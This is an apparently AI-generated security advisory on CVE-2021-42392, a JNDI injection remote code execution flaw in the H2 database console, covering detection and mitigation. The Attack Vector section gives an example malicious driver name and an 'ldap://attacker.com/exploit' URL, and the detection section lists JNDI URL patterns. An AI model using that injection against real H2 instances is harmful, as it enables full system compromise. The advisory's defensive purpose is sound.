CVE-2021-42392 Overview
CVE-2021-42392 is a critical remote code execution vulnerability affecting the H2 database engine. The vulnerability exists in the org.h2.util.JdbcUtils.getConnection method, which accepts a driver class name and database URL as parameters. An attacker can exploit this by supplying a JNDI driver name along with a malicious URL pointing to an attacker-controlled LDAP or RMI server, triggering remote code execution. This vulnerability is particularly dangerous when exploited through the H2 Console, which enables unauthenticated remote code execution.
Critical Impact
This vulnerability enables unauthenticated remote code execution through JNDI injection, allowing attackers to fully compromise systems running vulnerable H2 database instances with exposed H2 Console interfaces.
Affected Products
- H2database H2 (all versions prior to patch)
- Debian Linux 9.0, 10.0, and 11.0
- Oracle Communications Cloud Native Core Policy 1.15.0
Discovery Timeline
- 2022-01-10 - CVE CVE-2021-42392 published to NVD
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2021-42392
Vulnerability Analysis
This vulnerability leverages JNDI (Java Naming and Directory Interface) injection, a technique that gained significant attention following the Log4Shell vulnerability. The org.h2.util.JdbcUtils.getConnection method is designed to establish database connections using a provided driver class and URL. However, due to insufficient input validation, an attacker can specify JNDI-based driver names such as javax.naming.InitialContext combined with URLs pointing to malicious LDAP or RMI servers.
When the H2 database processes these malicious parameters, it performs a JNDI lookup to the attacker-controlled server. The remote server responds with a serialized Java object or a reference to a remote codebase, which the vulnerable H2 instance deserializes and executes. This attack chain is particularly severe because it requires no authentication when targeting the H2 Console, which is often enabled by default in development environments.
The vulnerability affects multiple attack surfaces within H2, but the H2 Console represents the most critical exposure point. Organizations using H2 as an embedded database in Java applications may also be vulnerable if the application exposes any functionality that allows user-controlled database connection parameters.
Root Cause
The root cause is classified as CWE-502 (Deserialization of Untrusted Data). The JdbcUtils.getConnection method fails to properly validate and restrict the driver class names and URLs that can be specified. By allowing arbitrary JNDI lookups through user-controlled input, the application inadvertently enables attackers to force connections to malicious naming services that return executable payloads. The lack of a whitelist for acceptable driver classes and URL schemes permits the exploitation of Java's JNDI mechanism for remote code execution.
Attack Vector
The attack is network-based and requires no authentication or user interaction when targeting the H2 Console. An attacker identifies an exposed H2 Console interface, typically accessible on port 8082 or embedded within web applications. The attacker then crafts a malicious request containing a JNDI driver name (e.g., javax.naming.InitialContext) and a URL pointing to their controlled LDAP or RMI server (e.g., ldap://attacker.com/exploit).
When the H2 database processes this connection request, it performs a JNDI lookup to the attacker's server. The malicious server responds with a Java object that, when deserialized by the vulnerable H2 instance, executes arbitrary code with the privileges of the Java process running H2.
The exploitation mechanism leverages the standard Java JNDI lookup functionality, making it difficult to detect without specific monitoring for outbound JNDI connections. Attackers typically host their malicious LDAP or RMI servers on internet-accessible infrastructure and may use common exploitation frameworks that automate payload generation.
Detection Methods for CVE-2021-42392
Indicators of Compromise
- Outbound network connections from Java processes to unexpected LDAP ports (389, 636, 1389) or RMI ports (1099)
- H2 Console access logs showing connection attempts with JNDI-style URLs containing ldap://, ldaps://, or rmi:// schemes
- Unusual process spawning from Java processes running H2 database, particularly shell commands or script interpreters
- Network traffic containing serialized Java objects or references to external codebases
Detection Strategies
- Monitor network traffic for outbound JNDI lookup patterns, specifically connections to LDAP/RMI ports originating from application servers
- Implement intrusion detection rules to identify HTTP requests to H2 Console containing JNDI injection payloads in connection parameters
- Audit Java application logs for connection attempts using non-standard driver class names, particularly javax.naming.InitialContext
- Deploy network segmentation monitoring to detect internal systems attempting to connect to external naming services
Monitoring Recommendations
- Enable detailed logging for H2 database connection attempts and review logs for suspicious driver class or URL patterns
- Configure alerts for any outbound LDAP or RMI traffic from production application servers
- Implement endpoint detection for anomalous process creation by Java processes, especially shell interpreters or download utilities
- Monitor for creation of unexpected files or processes following H2 Console access events
How to Mitigate CVE-2021-42392
Immediate Actions Required
- Upgrade H2 database to the latest patched version immediately
- Disable the H2 Console if it is not required for production operations
- Restrict network access to H2 Console interfaces using firewall rules, limiting access to trusted administrative networks only
- Audit all applications using H2 as an embedded database to identify potential exposure points
Patch Information
H2 database has released security patches addressing this vulnerability. Organizations should update to the latest version available from the official H2 database repositories. Detailed patch information is available in the GitHub Security Advisory. Oracle has also addressed this vulnerability in affected products through the April 2022 Critical Patch Update. Debian users should apply updates as documented in DSA-5076.
Workarounds
- Disable the H2 Console entirely by removing or commenting out the webAllowOthers setting in H2 configuration
- Implement network-level controls to block outbound LDAP and RMI connections from application servers
- Configure Java security manager policies to restrict JNDI lookups to trusted naming services only
- Deploy web application firewall rules to block requests containing JNDI injection patterns in connection strings
# Configuration example - Disable H2 Console in application properties
# For Spring Boot applications, add to application.properties:
spring.h2.console.enabled=false
# For standalone H2, remove or comment these settings:
# webAllowOthers=true
# webPort=8082
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
